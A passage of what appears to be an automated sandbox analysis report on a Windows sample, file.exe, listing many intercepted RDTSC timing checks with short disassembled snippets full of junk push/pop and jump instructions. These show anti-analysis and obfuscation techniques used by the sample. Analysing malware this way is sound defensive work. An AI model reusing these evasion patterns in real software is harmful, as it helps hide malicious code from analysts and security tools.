            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D167 second address: 91D16B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D16B second address: 91D171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D480 second address: 91D4AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F8408BD9DB9h 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007F8408BD9DA6h 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D4AA second address: 91D4BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F84084B162Ch 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DE81 second address: 91DE85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DE85 second address: 91DEB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F84084B1640h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DEB1 second address: 91DEC8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8408BD9DA6h 0x00000008 jmp 00007F8408BD9DAAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DEC8 second address: 91DEE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84084B1634h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 922722 second address: 92272C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E1AB second address: 92E1C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F84084B1626h 0x0000000a je 00007F84084B1626h 0x00000010 popad 0x00000011 push esi 0x00000012 push edi 0x00000013 pop edi 0x00000014 pop esi 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93215A second address: 93215E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9406B5 second address: 9406BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9406BB second address: 9406C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9406C1 second address: 9406F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B1634h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F84084B162Eh 0x00000011 pushad 0x00000012 popad 0x00000013 jo 00007F84084B1626h 0x00000019 jmp 00007F84084B162Eh 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9459D2 second address: 9459E6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F8408BD9DACh 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9459E6 second address: 945A14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B1636h 0x00000007 jmp 00007F84084B162Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945A14 second address: 945A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8408BD9DA6h 0x0000000a jmp 00007F8408BD9DB8h 0x0000000f popad 0x00000010 jp 00007F8408BD9DAEh 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945A45 second address: 945A4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945A4A second address: 945A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945A57 second address: 945A5D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D448 second address: 95D44E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D44E second address: 95D452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D452 second address: 95D456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D5A0 second address: 95D5EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B1635h 0x00000007 pushad 0x00000008 ja 00007F84084B1626h 0x0000000e jmp 00007F84084B162Dh 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F84084B1638h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pushad 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D5EC second address: 95D5F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95DEB7 second address: 95DEBC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95DEBC second address: 95DEC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E182 second address: 95E18C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E2BE second address: 95E2C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962B5B second address: 962B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962B5F second address: 962BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edx, dword ptr [ebp+1244AA75h] 0x0000000e push dword ptr [ebp+122D34C3h] 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F8408BD9DA8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e mov edx, dword ptr [ebp+1244AB7Ch] 0x00000034 cld 0x00000035 push CF2CF209h 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F8408BD9DB5h 0x00000041 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879B45 second address: 879B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 548037B second address: 548037F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 548037F second address: 5480392 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B162Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5480392 second address: 54803C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408BD9DB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8408BD9DADh 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54803C0 second address: 54803C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54803C6 second address: 54803EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408BD9DB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov dh, 09h 0x00000013 push eax 0x00000014 pop edi 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B053F second address: 54B0545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0545 second address: 54B0549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0549 second address: 54B05A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F84084B1634h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F84084B1630h 0x00000016 mov ebp, esp 0x00000018 jmp 00007F84084B1630h 0x0000001d xchg eax, ecx 0x0000001e pushad 0x0000001f mov cx, BFCDh 0x00000023 mov bh, al 0x00000025 popad 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F84084B162Eh 0x00000030 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B05A7 second address: 54B05B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408BD9DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B05B6 second address: 54B066C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B1639h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F84084B162Eh 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 mov cl, E7h 0x00000013 call 00007F84084B1633h 0x00000018 call 00007F84084B1638h 0x0000001d pop esi 0x0000001e pop ebx 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F84084B1631h 0x00000026 xchg eax, esi 0x00000027 jmp 00007F84084B162Eh 0x0000002c lea eax, dword ptr [ebp-04h] 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F84084B162Eh 0x00000036 jmp 00007F84084B1635h 0x0000003b popfd 0x0000003c mov eax, 5A33B237h 0x00000041 popad 0x00000042 nop 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 mov dl, F2h 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B066C second address: 54B0671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0671 second address: 54B067F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84084B162Ah 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B067F second address: 54B0683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0721 second address: 54B0727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0727 second address: 54B072B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B072B second address: 54B077F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-04h], 00000000h 0x0000000c pushad 0x0000000d jmp 00007F84084B1635h 0x00000012 popad 0x00000013 mov esi, eax 0x00000015 jmp 00007F84084B162Dh 0x0000001a je 00007F84084B16A3h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F84084B1638h 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B077F second address: 54B078E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408BD9DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B07B6 second address: 54B07C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B162Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B07C9 second address: 54B07F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 7FDCE07Ah 0x00000008 call 00007F8408BD9DABh 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007F8408BD9DACh 0x0000001b popad 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B07F2 second address: 54B0860 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B162Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b mov esi, 6A3AE1FBh 0x00000010 mov dl, ch 0x00000012 popad 0x00000013 leave 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F84084B1634h 0x0000001d sub cx, 4C78h 0x00000022 jmp 00007F84084B162Bh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F84084B1638h 0x0000002e adc ax, 66D8h 0x00000033 jmp 00007F84084B162Bh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B0860 second address: 54A0008 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 0DFAh 0x00000007 pushfd 0x00000008 jmp 00007F8408BD9DABh 0x0000000d xor eax, 4BAD519Eh 0x00000013 jmp 00007F8408BD9DB9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c retn 0004h 0x0000001f nop 0x00000020 cmp eax, 00000000h 0x00000023 setne al 0x00000026 xor ebx, ebx 0x00000028 test al, 01h 0x0000002a jne 00007F8408BD9DA7h 0x0000002c xor eax, eax 0x0000002e sub esp, 08h 0x00000031 mov dword ptr [esp], 00000000h 0x00000038 mov dword ptr [esp+04h], 00000000h 0x00000040 call 00007F840D9D31E3h 0x00000045 mov edi, edi 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A0008 second address: 54A0023 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B1637h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A0023 second address: 54A0046 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408BD9DB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A0046 second address: 54A0094 instructions: 0x00000000 rdtsc 0x00000002 call 00007F84084B1638h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F84084B1637h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F84084B1635h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A0094 second address: 54A00E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 mov di, E6DEh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F8408BD9DABh 0x00000015 jmp 00007F8408BD9DB3h 0x0000001a popfd 0x0000001b mov bl, ch 0x0000001d popad 0x0000001e push FFFFFFFEh 0x00000020 pushad 0x00000021 mov cx, dx 0x00000024 mov cl, bh 0x00000026 popad 0x00000027 push 693DE4B9h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push eax 0x00000030 pop edx 0x00000031 call 00007F8408BD9DAAh 0x00000036 pop esi 0x00000037 popad 0x00000038 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A00E5 second address: 54A0121 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B1630h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 0D5CB98Fh 0x00000010 jmp 00007F84084B1630h 0x00000015 call 00007F84084B1629h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov dl, 25h 0x0000001f mov cl, 11h 0x00000021 popad 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A0121 second address: 54A013B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408BD9DB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dh, 29h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A013B second address: 54A0210 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F84084B1634h 0x00000008 sbb cx, 8058h 0x0000000d jmp 00007F84084B162Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jmp 00007F84084B1639h 0x0000001f mov eax, dword ptr [eax] 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F84084B1637h 0x00000028 or si, BC7Eh 0x0000002d jmp 00007F84084B1639h 0x00000032 popfd 0x00000033 jmp 00007F84084B1630h 0x00000038 popad 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d pushad 0x0000003e jmp 00007F84084B1631h 0x00000043 mov dx, cx 0x00000046 popad 0x00000047 pop eax 0x00000048 jmp 00007F84084B162Ah 0x0000004d mov eax, dword ptr fs:[00000000h] 0x00000053 jmp 00007F84084B1630h 0x00000058 nop 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A0210 second address: 54A0214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A0214 second address: 54A021A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A021A second address: 54A0243 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408BD9DB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8408BD9DAEh 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A0243 second address: 54A0249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A0394 second address: 54A039A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A039A second address: 54A0405 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B1633h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [ebp-08h], eax 0x0000000e pushad 0x0000000f mov bl, ah 0x00000011 popad 0x00000012 xor eax, ebp 0x00000014 pushad 0x00000015 push edx 0x00000016 movzx eax, dx 0x00000019 pop edi 0x0000001a pushfd 0x0000001b jmp 00007F84084B162Eh 0x00000020 jmp 00007F84084B1635h 0x00000025 popfd 0x00000026 popad 0x00000027 nop 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F84084B1638h 0x00000031 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A0405 second address: 54A040B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A040B second address: 54A0411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A0411 second address: 54A0415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A0415 second address: 54A0473 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B1638h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F84084B162Bh 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F84084B162Bh 0x0000001b adc si, E29Eh 0x00000020 jmp 00007F84084B1639h 0x00000025 popfd 0x00000026 mov cx, A667h 0x0000002a popad 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A0473 second address: 54A0508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408BD9DADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c pushad 0x0000000d mov cx, B1F3h 0x00000011 pushfd 0x00000012 jmp 00007F8408BD9DB8h 0x00000017 adc ah, FFFFFFF8h 0x0000001a jmp 00007F8408BD9DABh 0x0000001f popfd 0x00000020 popad 0x00000021 mov dword ptr fs:[00000000h], eax 0x00000027 pushad 0x00000028 call 00007F8408BD9DABh 0x0000002d mov ch, 9Fh 0x0000002f pop edx 0x00000030 popad 0x00000031 mov dword ptr [ebp-18h], esp 0x00000034 pushad 0x00000035 mov bx, cx 0x00000038 popad 0x00000039 mov eax, dword ptr fs:[00000018h] 0x0000003f jmp 00007F8408BD9DAFh 0x00000044 mov ecx, dword ptr [eax+00000FDCh] 0x0000004a pushad 0x0000004b mov dl, al 0x0000004d movsx edi, si 0x00000050 popad 0x00000051 test ecx, ecx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F8408BD9DAFh 0x0000005a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A0508 second address: 54A0520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84084B1634h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A0520 second address: 54A053A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007F8408BD9DD9h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8408BD9DAAh 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A053A second address: 54A058E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B162Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add eax, ecx 0x0000000b jmp 00007F84084B1636h 0x00000010 mov ecx, dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F84084B162Dh 0x0000001c sub ax, 8BC6h 0x00000021 jmp 00007F84084B1631h 0x00000026 popfd 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A058E second address: 54A0593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5490308 second address: 54903FC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F84084B1638h 0x00000008 sbb ax, 1768h 0x0000000d jmp 00007F84084B162Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F84084B1638h 0x0000001b jmp 00007F84084B1635h 0x00000020 popfd 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007F84084B1631h 0x00000028 xchg eax, ebx 0x00000029 jmp 00007F84084B162Eh 0x0000002e xchg eax, edi 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F84084B162Eh 0x00000036 or ah, FFFFFF88h 0x00000039 jmp 00007F84084B162Bh 0x0000003e popfd 0x0000003f pushfd 0x00000040 jmp 00007F84084B1638h 0x00000045 sub esi, 570E80E8h 0x0000004b jmp 00007F84084B162Bh 0x00000050 popfd 0x00000051 popad 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 pushfd 0x00000057 jmp 00007F84084B1632h 0x0000005c or cl, 00000048h 0x0000005f jmp 00007F84084B162Bh 0x00000064 popfd 0x00000065 pushad 0x00000066 popad 0x00000067 popad 